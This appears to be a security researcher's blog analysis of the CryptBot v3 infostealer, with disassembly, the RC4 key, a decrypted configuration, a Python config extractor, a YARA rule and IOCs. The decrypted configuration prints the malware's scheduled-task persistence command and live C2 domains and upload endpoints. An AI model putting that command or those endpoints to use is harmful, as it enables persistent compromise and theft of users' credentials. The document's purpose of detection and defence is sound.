CryptBot v3 (Final) - Malware Analysis

Overview

CryptBot is a persistent infostealer malware targeting Windows systems, first identified in 2019. Its primary goal is to steal sensitive data, including browser credentials, cryptocurrency wallets, cookies, credit card details, and system screenshots. Distributed via phishing emails, cracked software sites, or malicious LNK files, CryptBot has evolved significantly. This analysis examines version 3 (CryptBot v3.0), which builds on the techniques observed in v2 (see our previous analysis), introducing a new compiler, enhanced obfuscation, and refined infection chains.

Key updates in v3 include a switch to the GNU linker ld (GNU Binutils 2.40), potentially to evade signature-based detection, a new RC4 key (LkgwUi), and the use of advanced obfuscation techniques, possibly leveraging the gimple obfuscator. The malware retains its core functionality, including RC4 encryption for data exfiltration, but introduces new C2 domains and modified persistence mechanisms. Variants continue to show code reuse with other stealers, often referred to as "Yet Another Silly Stealer (YASS)."

What is RC4 Encryption?

As discussed in our CryptBot v2 analysis, RC4 (Rivest Cipher 4) is a stream cipher used by CryptBot to encrypt stolen data before exfiltration to command-and-control (C2) servers. Its simplicity and speed make it ideal for malware, though its cryptographic weaknesses remain a concern. In v3, the RC4 implementation remains consistent, but the key has changed to LkgwUi.

Analysis

Activities

• Data Theft: Steals data from web browsers (e.g., Chrome, Edge, Firefox), cryptocurrency wallets (e.g., MetaMask, Phantom), user directories (e.g., Desktop, Documents), and system information such as installed software and screenshots.
• Evasion Techniques: Employs anti-analysis checks, including environment variable inspection (e.g., LocalAppData, AppData), file existence checks, and virtual machine detection, enhanced by heavy obfuscation in the binary.
• Persistence: Uses scheduled tasks (e.g., schtasks /create /tn \Service\Data /tr) to maintain persistence across reboots, consistent with v2 but with updated paths like \ServiceData\Clip.au3.
• Backdoor Deployment: Downloads remote scripts, potentially NetSupport RAT, via PowerShell from domains like analforeverlovyu.top, enabling persistent access.
• Infection Chain: Initiates with malicious LNK files executing PowerShell, which runs obfuscated scripts to download ZIP archives. These archives contain loaders, such as Delphi-based IDATLOADER, injecting shellcode to deploy the stealer.
• Data Exfiltration: Encrypts stolen data in ZIP archives using RC4 and uploads them to C2 servers via HTTP POST requests to endpoints like /v1/upload.php.
• Frequent Updates: CryptBot v3 frequently updates its variants, incorporating code reuse and obfuscation to evade detection.

Programming Language

The malware is written in C/C++, as indicated by low-level Windows API calls and memory management patterns observed during analysis with IDA Pro. Unlike v2, which used Microsoft’s linker, v3 is compiled with GNU linker ld (GNU Binutils 2.40), likely to disrupt signature-based tracking. Dynamic imports from libraries like kernel32.dll, wininet.dll, and crypt32.dll are resolved at runtime, consistent with v2.

cCopy
1Linker: GNU linker ld (GNU Binutils)
2Description: Linker -  GNU linker ld (GNU Binutils)(2.40)[GUI32]
3Info: GUI32
4Version: 2.40

Static Analysis

String Extraction

Extracting wide strings from the binary reveals stealer-related indicators, many of which overlap with v2, such as:

cCopy
1UID:
2UserName:
3ComputerName:
4DateTime:
5UserAgent:
6Keyboard Languages:
7Display Resolution:
8CPU:
9RAM:
10GPU:
11Installed Apps:

Additional strings include build artifacts exposing the development environment:

bashCopy
1/home/anal/bot/zip_include/zip.c
2/home/anal/bot/zip_include/miniz.h

These paths suggest a Linux-based build environment, a shift from v2, potentially to obscure the malware’s origin.

Main Function

The main function in v3 is heavily obfuscated, with IDA Pro reporting "sorry, this node is too big to display" due to extensive data initialization. The function moves data dynamically into the .data section, as shown below:

This extensive data initialization, stored in the .data section (e.g., dword_807140 to dword_80718C)

nasmCopy
1text:005AF200                 push    ebp
2.text:005AF201                 mov     ebp, esp
3.text:005AF203                 push    edi
4.text:005AF204                 push    esi
5.text:005AF205                 push    ebx
6.text:005AF206                 and     esp, 0FFFFFFF0h
7.text:005AF209                 sub     esp, 0B0h
8.text:005AF20F                 mov     ebx, [ebp+argc]
9.text:005AF212                 mov     edi, [ebp+argv]
10.text:005AF215                 mov     esi, [ebp+envp]
11.text:005AF218                 call    sub_401780
12.text:005AF21D                 mov     edx, 0FFFFCE8Ch
13.text:005AF222                 mov     ecx, 4
14.text:005AF227                 mov     dword_80A0A0, 2F5Eh
15.text:005AF231                 mov     eax, ds:pbBuffer
16.text:005AF236                 mov     [esp+0BCh+var_10], eax
17.text:005AF23D                 xor     eax, eax
18.text:005AF23F                 mov     eax, 29B9h
19.text:005AF244                 mov     dword_807120, 17AEh
20.text:005AF24E                 mov     dword_807140, 0AB0E1B75h
21.text:005AF258                 mov     dword_807144, 3686Ch
22.text:005AF262                 mov     dword_807148, 65CC42F2h
23.text:005AF26C                 mov     dword_80714C, 8C014825h
24.text:005AF276                 mov     dword_807150, 0BF4C4495h
25.text:005AF280                 mov     dword_807154, 8AFBAE0Eh
26.text:005AF28A                 mov     dword_807158, 0C97E436Eh
27.text:005AF294                 mov     dword_80715C, 1E64401Ah
28.text:005AF29E                 mov     dword_807160, 0CEBE992Dh
29.text:005AF2A8                 mov     dword_807164, 9289F207h
30.text:005AF2B2                 mov     dword_807168, 0E79964D6h
31.text:005AF2BC                 mov     dword_80716C, 91D43309h
32.text:005AF2C6                 mov     dword_807170, 7670A9C1h
33.text:005AF2D0                 mov     dword_807174, 6ED804Dh
34.text:005AF2DA                 mov     dword_807178, 299A7B86h
35.text:005AF2E4                 mov     dword_80717C, 57DDDD62h
36.text:005AF2EE                 mov     dword_807180, 0D8D70F48h
37.text:005AF2F8                 mov     dword_807184, 0A1105B5Ah
38.text:005AF302                 mov     dword_807188, 2F458880h
39.text:005AF30C                 mov     dword_80718C, 3F031802h

Deeply analsysis suggests the use of an obfuscator, potentially gimple (see hellscape).

nasmCopy
1.text:006C392D                 vzeroupper
2.text:006C3930                 call    sub_425100
3.text:006C3935                 mov     eax, [esp+0BCh+var_10]

The function ends with a call to sub_425100, renamed mw_main_1 for clarity:

nasmCopy
1.text:006C3930                 call    mw_main_1

Many calls and insane thing happen on this binary so let's move to dynamic analysis ...

Dynamic Analysis

Dynamic analysis was performed using x32dbg, setting breakpoints on key functions:

• main
• strcmp
• strlen
• strncmp
• strncpy

Breakpoints were set as follows:

bashCopy
1Type=Software
2Address=000714A0
3Module/Label/Exception=<crypt.exe.OptionalHeader.AddressOfEntryPoint>
4State=One-time
5Disassembly=mov dword ptr ds:[9B3070],1
6Summary=entry breakpoint
7...
8Address=0021F200
9Module/Label/Exception=<crypt.exe.main>
10State=Enabled
11Disassembly=push ebp
12...
13Address=777796A0
14Module/Label/Exception=<msvcrt.dll.strcmp>
15State=Enabled
16Disassembly=mov edx,dword ptr ss:[esp+4]
17...

The entry point (0x00070000) was aligned with IDA Pro for consistency.

Running until the strlen breakpoint revealed the RC4 key LkgwUi at 011FF5C0.

The encrypted blob at 0x00475960 was extracted and decrypted, confirming the configuration’s similarity to v2.

RC4 Implementation

The RC4 encryption routine remains consistent with v2, using a new key (LkgwUi). The implementation is similar to the mw_rc4 function described in our previous analysis. The key is identified during dynamic analysis at address 011FF570:

cCopy
1"LkgwUi"

Manual Decryption

To decrypt the configuration, extract the encrypted blob at address 0x00475960 using x32dbg or IDA Pro:

bashCopy
1# In x32dbg, navigate to 0x00475960 and extract bytes

The extracted hex blob (partial example):

textCopy
1FE 93 1F C5 6E 11 10 78 AE 72 C8 0B 72 3C 18 FC E7 18 10 CA 6D E1 C5 F3 69 0A 02 99 64 0C 60 79 2A CC DD C4 07 A1 82 E0 D5 0D A9 82 02 52 EE F0 B2 F5 4A 13 76 F6 D6 65 B3 3F F1 5D 4F 81 F5 3B 46 7F 8E B9 7A 68 73 FD D9 ED 6B 59 38 7B 03 7B 40 8A 22 53 52 BD 6E AC 2C 94 B0 F1 F0 05 70 75 E9 F3 A9 EF F1 08 29 5D 6D A1 54 2A 25 97 E0 97 27 80 B0 9C 0B 9F 32 9A 3D 95 78 23 AF A1 C5 C4 A3 06 47 89 E7 8C 00 D6 37 E0 E9 F3 1D 5B FA 82 63 DD E2 B1 DF 9B 1A 01 D6 A0 79 43 1D 13 60 34 C1 5B 1B 9B 57 8A 5E 82 82 62 BC 96 00 CB E9 68 37 76 E7 77 01 F5 7E E1 E7 C6 29 4D AF BB 88 A0 63 47 8F C7 3C 61 3C A6 41 37 15 C9 94 5F 9A C7

In CyberChef:

1. Input the extracted hex content.
2. Apply the RC4 recipe with the passphrase LkgwUi, setting Input to Hex and Output to Latin1.

Decrypted Config:

codeCopy
1tventyvx20pn.top
2\nuSONyiIRP
3LkgwUi
4\ServiceData
5\ServiceData\Clip.au3
6\ServiceData\Clip.exe
7/c schtasks /create /tn \Service\Data /tr """"%wS""" """%wS"""" /st 00:01 /du 9800:59 /sc once /ri 1 /f
8GET
9POST
10/index.php
11/gate.php
12/zip.php
13/v1/upload.php
14curl/8.0.1
15NULL
16NULL
17NULL
18Content-Length: %lu
19HTTP
20HTTPS
21"encrypted_key":"
22DPAPI
23DISPLAY
24$CREEN.JPEG
25ScreenShot.jpeg
26Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; rv:11.0) like Gecko
27Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
28Apps
29Browsers
30Files
31Wallets
32UserID.txt
33Debug.txt
34End.txt
35log.txt
36User's Computer Information.txt
37Desktop
38Others
39NULL
40An error occurred while starting the application (0xc000007b). To exit the application, click OK.
41System Error
42NULL
43ComSpec
44LocalAppData
45AppData
46Temp
47UserProfile
48NULL
49NULL
50analforeverlovyu.top
51NULL
52kernel32.dll
53ntdll.dll
54user32.dll
55shlwapi.dll
56msvcrt.dll
57shell32.dll
58wininet.dll
59winhttp.dll
60ws2_32.dll
61urlmon.dll
62crypt32.dll
63gdi32.dll
64gdiplus.dll
65ole32.dll
66cabinet.dll
67advpack.dll
68advapi32.dll
69rstrtmgr.dll
70winsqlite3.dll
71NULL
72NULL
73NULL
74NULL
75NULL
76NULL
77NULL
78NULL
79NULL
80NULL
81NULL
82GetModuleHandleA
83GetModuleHandleW
84GetModuleHandleExA
85GetModuleHandleExW
86LoadLibraryA
87LoadLibraryW
88LoadLibraryExA
89LoadLibraryExW
90GetProcAddress
91FreeLibrary
92NULL
93MessageBoxA
94MessageBoxW
95NULL
96CreateThread
97CreateRemoteThread
98CreateRemoteThreadEx
99OpenThread
100OpenProcess
101GetThreadId
102GetProcessId
103CreateMutexA
104CreateMutexW
105ReleaseMutex
106WaitForSingleObject
107CreateProcessA
108CreateProcessW
109ShellExecuteA
110ShellExecuteW
111WinExec
112NULL
113HeapCreate
114GetProcessHeap
115HeapAlloc
116HeapReAlloc
117HeapSize
118HeapFree
119NULL
120VirtualAlloc
121VirtualAllocEx
122VirtualFree
123VirtualFreeEx
124VirtualProtect
125VirtualProtectEx
126NULL
127LocalAlloc
128LocalFree
129NULL
130calloc
131malloc
132realloc
133free
134NULL
135CreateFileA
136CreateFileW
137ReadFile
138WriteFile
139SetFilePointer
140SetFilePointerEx
141GetFileAttributesA
142GetFileAttributesW
143GetFileAttributesExA
144GetFileAttributesExW
145GetFileSize
146GetFileSizeEx
147CreateFileMappingA
148CreateFileMappingW
149MapViewOfFile
150UnmapViewOfFile
151CloseHandle
152NULL
153SHGetFolderPathA
154SHGetFolderPathW
155GetEnvironmentVariableA
156GetEnvironmentVariableW
157ExpandEnvironmentStringsA
158ExpandEnvironmentStringsW
159GetModuleFileNameA
160GetModuleFileNameW
161GetModuleFileNameExA
162GetModuleFileNameExW
163GetCurrentDirectoryA
164GetCurrentDirectoryW
165GetSystemDirectoryA
166GetSystemDirectoryW
167GetSystemWow64DirectoryA
168GetSystemWow64DirectoryW
169GetTempPathA
170GetTempPathW
171GetTempFileNameA
172GetTempFileNameW
173NULL
174URLDownloadToFileA
175URLDownloadToFileW
176URLOpenBlockingStreamA
177URLOpenBlockingStreamW
178CoInitialize
179CoUninitialize
180NULL
181WinHttpCrackUrl
182WinHttpOpen
183WinHttpConnect
184WinHttpOpenRequest
185WinHttpAddRequestHeaders
186WinHttpSendRequest
187WinHttpReceiveResponse
188WinHttpReadData
189WinHttpReadDataEx
190WinHttpQueryHeaders
191WinHttpQueryOption
192WinHttpCloseHandle
193NULL
194InternetCrackUrlA
195InternetOpenUrlA
196InternetOpenA
197InternetConnectA
198HttpOpenRequestA
199HttpSendRequestA
200HttpQueryInfoA
201InternetReadFile
202InternetReadFileExA
203InternetCloseHandle
204NULL
205InternetCrackUrlW
206InternetOpenUrlW
207InternetOpenW
208InternetConnectW
209HttpOpenRequestW
210HttpSendRequestW
211HttpQueryInfoW
212InternetReadFile
213InternetReadFileExW
214InternetCloseHandle
215NULL
216WSAStartup
217socket
218htons
219inet_addr
220bind
221listen
222accept
223recv
224recvfrom
225send
226closesocket
227WSAGetLastError
228WSACleanup
229NULL
230FindFirstFileNameA
231FindFirstFileNameW
232FindNextFileNameA
233FindNextFileNameW
234FindFirstFileA
235FindFirstFileW
236FindFirstFileExA
237FindFirstFileExW
238FindNextFileA
239FindNextFileW
240FindClose
241NULL
242RegOpenKeyExA
243RegOpenKeyExW
244RegQueryInfoKeyA
245RegQueryInfoKeyW
246RegEnumKeyExA
247RegEnumKeyExW
248RegQueryValueExA
249RegQueryValueExW
250RegCloseKey
251NULL
252wnsprintfA
253wnsprintfW
254StrStrIA
255StrStrIW
256PathIsDirectoryA
257PathIsDirectoryW
258PathFileExistsA
259PathFileExistsW
260SHAnsiToUnicode
261SHUnicodeToAnsi
262NULL
263wsprintfA
264wsprintfW
265_snprintf
266_snwprintf
267swprintf
268sprintf
269_swprintf
270sprintf_s
271swprintf_s
272_snwprintf_s
273_vscprintf
274vsnprintf
275_vscwprintf
276vswprintf
277NULL
278WideCharToMultiByte
279MultiByteToWideChar
280GetComputerNameA
281GetComputerNameW
282GetUserNameA
283GetUserNameW
284CopyFileA
285CopyFileW
286CopyFileExA
287CopyFileExW
288DeleteFileA
289DeleteFileW
290MoveFileA
291MoveFileW
292MoveFileExA
293MoveFileExW
294CreateDirectoryA
295CreateDirectoryW
296RemoveDirectoryA
297RemoveDirectoryW
298NULL
299EnumDisplaySettingsA
300EnumDisplaySettingsW
301CreateDCA
302CreateDCW
303CreateCompatibleDC
304CreateCompatibleBitmap
305SelectObject
306BitBlt
307GetDeviceCaps
308StretchBlt
309GetObjectA
310GetObjectW
311GetDIBits
312ReleaseDC
313DeleteDC
314NULL
315GdiplusStartup
316GdipGetImageEncoders
317GdipGetImageEncodersSize
318GdipLoadImageFromFile
319GdipCreateBitmapFromHBITMAP
320GdipSaveImageToFile
321GdipSaveImageToStream
322GetBitmapBits
323DeleteObject
324GdiplusShutdown
325NULL
326SHCreateMemStream
327CreateStreamOnHGlobal
328SaveImageToStream
329IStream_Size
330IStream_Reset
331IStream_Read
332NULL
333ExtractFilesA
334ExtractFilesW
335Extract
336FCICreate
337FCIAddFile
338FCIFlushFolder
339FCIFlushCabinet
340FCIDestroy
341NULL
342CryptUnprotectData
343GetTickCount
344GetTickCount64
345QueryPerformanceCounter
346CreateToolhelp32Snapshot
347Process32FirstA
348Process32FirstW
349Process32NextA
350Process32NextW
351GetLocaleInfoA
352GetLocaleInfoW
353GetLogicalDriveStringsA
354GetLogicalDriveStringsW
355GetDriveTypeA
356GetDriveTypeW
357GetVolumeInformationA
358GetVolumeInformationW
359GetDiskFreeSpaceExA
360GetDiskFreeSpaceExW
361ReadConsoleA
362ReadConsoleW
363WriteConsoleA
364WriteConsoleW
365GetCommandLineA
366GetCommandLineW
367GetConsoleMode
368printf
369wprintf
370atoi
371_wtoi
372FileTimeToSystemTime
373GetFileInformationByHandle
374IsBadReadPtr
375SystemTimeToFileTime
376GetTimeZoneInformation
377GetLocalTime
378GlobalMemoryStatusEx
379DuplicateHandle
380GetCurrentProcess
381GetCurrentThread
382GetUserDefaultLocaleName
383GetSystemMetrics
384GetSystemInfo
385GetNativeSystemInfo
386IsWow64Process
387IsWow64Process2
388GetKeyboardLayoutList
389RtlGetVersion
390GetLastError
391SetErrorMode
392abs
393clock
394OpenProcess
395TerminateProcess
396RmStartSession
397RmRegisterResources
398RmGetList
399RmEndSession
400strtod
401isspace
402Sleep
403SleepEx
404GetExitCodeThread
405ExitThread
406ExitProcess
407FileTimeToDosDateTime
408WinHttpSetOption
409NULL
410NULL
411NULL
412NULL
413NULL
414NULL
415NULL
416NULL
417NULL
418NULL
419NULL
420NULL
421NULL
422NULL
423NULL

This configuration closely resembles v2’s, with updated C2 domains (e.g., tventyvx20pn.top, analforeverlovyu.top) and a new file extension (Clip.au3).

Malware Configuration Extractor

The Python script for extracting and decrypting the configuration is adapted from v2, updated for the new RC4 key (LkgwUi) and blob address (0x00475960). The script assumes the encrypted blob is extracted as hex.

pythonCopy
1import argparse
2import re
3
4def rc4(key, data):
5    """
6    RC4 decryption implementation based on CryptBot's mw_rc4 function.
7    Key: The encryption key (e.g., 'LkgwUi').
8    Data: The encrypted blob as bytes.
9    Returns: Decrypted data as a bytearray.
10    """
11    S = list(range(256))
12    j = 0
13    out = bytearray()
14
15    # KSA (Key Scheduling Algorithm)
16    for i in range(256):
17        j = (j + S[i] + key[i % len(key)]) % 256
18        S[i], S[j] = S[j], S[i]
19
20    # PRGA (Pseudo-Random Generation Algorithm)
21    i = j = 0
22    for byte in data:
23        i = (i + 1) % 256
24        j = (j + S[i]) % 256
25        S[i], S[j] = S[j], S[i]
26        k = S[(S[i] + S[j]) % 256]
27        out.append(byte ^ k)
28
29    return out
30
31def extract_config(binary_path, key_str='LkgwUi', blob_size=6500):
32    """
33    Extracts and decrypts the configuration from a CryptBot v3 binary.
34    binary_path: Path to the binary file.
35    key_str: RC4 key (default: 'LkgwUi').
36    blob_size: Size of the encrypted blob (default: 6500).
37    Returns: Decrypted configuration as a string or error message.
38    """
39    key = bytearray(key_str.encode('utf-8'))
40    
41    try:
42        with open(binary_path, 'rb') as f:
43            binary_data = f.read()
44    except Exception as e:
45        return f"Error reading binary file: {e}"
46
47    # Search for the RC4 key in the binary
48    key_pattern = re.escape(key_str).encode('utf-8')
49    key_match = re.search(key_pattern, binary_data)
50    
51    if not key_match:
52        return f"Error: RC4 key '{key_str}' not found in binary."
53
54    # Locate the encrypted blob (0x00475960)
55    blob_start = None
56    try:
57        base_address = 0x400000  # Typical PE base address
58        target_offset = 0x00475960 - base_address
59        if target_offset + blob_size <= len(binary_data):
60            blob_start = target_offset
61        else:
62            blob_start = key_match.end() + 10  # Heuristic offset
63    except:
64        return "Error: Unable to determine blob offset."
65
66    if blob_start + blob_size > len(binary_data):
67        return "Error: Blob size exceeds binary length."
68
69    # Extract and decrypt the blob
70    encrypted_blob = binary_data[blob_start:blob_start + blob_size]
71    decrypted = rc4(key, encrypted_blob)
72    
73    try:
74        config = decrypted.decode('latin1').rstrip('\x00')
75        config_lines = [line for line in config.split('\x00') if line]
76        return '\n'.join(config_lines)
77    except UnicodeDecodeError:
78        return decrypted.hex()
79
80def main():
81    parser = argparse.ArgumentParser(description="CryptBot v3 Configuration Extractor")
82    parser.add_argument("binary", help="Path to the CryptBot binary file")
83    parser.add_argument("--key", default="LkgwUi", help="RC4 key (default: LkgwUi)")
84    parser.add_argument("--size", type=int, default=6500, help="Size of encrypted blob (default: 6500)")
85    args = parser.parse_args()
86
87    config = extract_config(args.binary, args.key, args.size)
88    print("Decrypted Configuration:")
89    print(config)
90
91if __name__ == "__main__":
92    main()

Explanation of the Extractor

• RC4 Function: Replicates the mw_rc4 function from v2, performing KSA and PRGA for decryption.
• Blob Extraction: Locates the encrypted configuration at 0x00475960. Falls back to a heuristic offset if the address is invalid.
• Output: Decodes the decrypted configuration as Latin1, cleaning null bytes. Returns hex if decoding fails.

Yara Rule

The Yara rule for v3 is adapted from v2 to account for the new RC4 key and C2 domains, maintaining strict conditions to reduce false positives.

cCopy
1rule CryptBot_v3 {
2    meta:
3        author = "0xw43l"
4        description = "Detects CryptBot v3 infostealer based on RC4 key, C2 strings, and configuration artifacts"
5        reference = "https://0xw43l.com/posts/CryptBot-0x03/"
6        date = "2025-08-30"
7
8    strings:
9        // RC4 Key
10        $key = "LkgwUi" ascii fullword
11        
12        // C2 Domains and Paths
13        $c2_1 = "tventyvx20pn.top" ascii
14        $c2_2 = "analforeverlovyu.top" ascii
15        $c2_3 = "/index.php" ascii
16        $c2_4 = "/gate.php" ascii
17        $c2_5 = "/zip.php" ascii
18        $c2_6 = "/v1/upload.php" ascii
19        $path_1 = "\\nuSONyiIRP" ascii
20        $path_2 = "\\ServiceData" ascii
21        $path_3 = "\\ServiceData\\Clip.au3" ascii
22        $path_4 = "\\ServiceData\\Clip.exe" ascii
23        
24        // Persistence Command
25        $persist = "/c schtasks /create /tn \\Service\\Data /tr" ascii
26        
27        // Stealer Strings
28        $s1 = "UID:" ascii
29        $s2 = "UserName:" ascii
30        $s3 = "ComputerName:" ascii
31        $s4 = "DateTime:" ascii
32        $s5 = "UserAgent:" ascii
33        $s6 = "Keyboard Languages:" ascii
34        $s7 = "Display Resolution:" ascii
35        $s8 = "CPU:" ascii
36        $s9 = "RAM:" ascii
37        $s10 = "GPU:" ascii
38        $s11 = "Installed Apps:" ascii
39
40    condition:
41        $key and (2 of ($c2_*)) and (2 of ($path_*)) and $persist and 6 of ($s*)
42}

Yara Rule Enhancements

• Updated Strings: Includes new RC4 key (LkgwUi) and C2 domains (e.g., tventyvx20pn.top).
• Stricter Conditions: Requires at least two C2-related strings and two path-related strings.
• Metadata: Updated date and reference for v3.

Samples (SHA256 Hashes)

• Core Malware:
  • ff10143803f39c6c08b2fbe846d990b92c6d1b71e27f89bca69ab9331945b14a (Analyzed in this report)
• Note: Additional sample hashes for v2 can be found in our previous analysis

MITRE ATT&CK Mapping

| Tactic | Technique ID | Technique Name | |-------------------------|--------------|-----------------------------------------| | Initial Access | T1204.002 | User Execution: Malicious File | | Execution | T1059.001 | Command and Scripting Interpreter: PowerShell | | Execution | T1059.007 | Command and Scripting Interpreter: JavaScript/JScript | | Persistence | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | | Defense Evasion | T1140 | Deobfuscate/Decode Files or Information | | Defense Evasion | T1027 | Obfuscated Files or Information | | Defense Evasion | T1497 | Virtualization/Sandbox Evasion | | Credential Access | T1555.003 | Credentials from Password Stores: Credentials from Web Browsers | | Collection | T1005 | Data from Local System | | Collection | T1119 | Automated Collection | | Collection | T1113 | Screen Capture | | Command and Control | T1071.001 | Application Layer Protocol: Web Protocols | | Command and Control | T1573.001 | Encrypted Channel: Symmetric Cryptography | | Exfiltration | T1041 | Exfiltration Over C2 Channel |

Indicators of Compromise (IOCs)

| Type | Indicator | Description | |-----------|---------------------------------------------------------------------------|------------------------------| | Domain | tventyvx20pn.top | C2 Domain | | Domain | analforeverlovyu.top | C2 Domain | | Path | \nuSONyiIRP | Persistence Path | | Path | \ServiceData | Persistence Path | | Path | \ServiceData\Clip.au3 | Dropped File | | Path | \ServiceData\Clip.exe | Dropped File | | Hash (SHA256) | ff10143803f39c6c08b2fbe846d990b92c6d1b71e27f89bca69ab9331945b14a | Core Malware |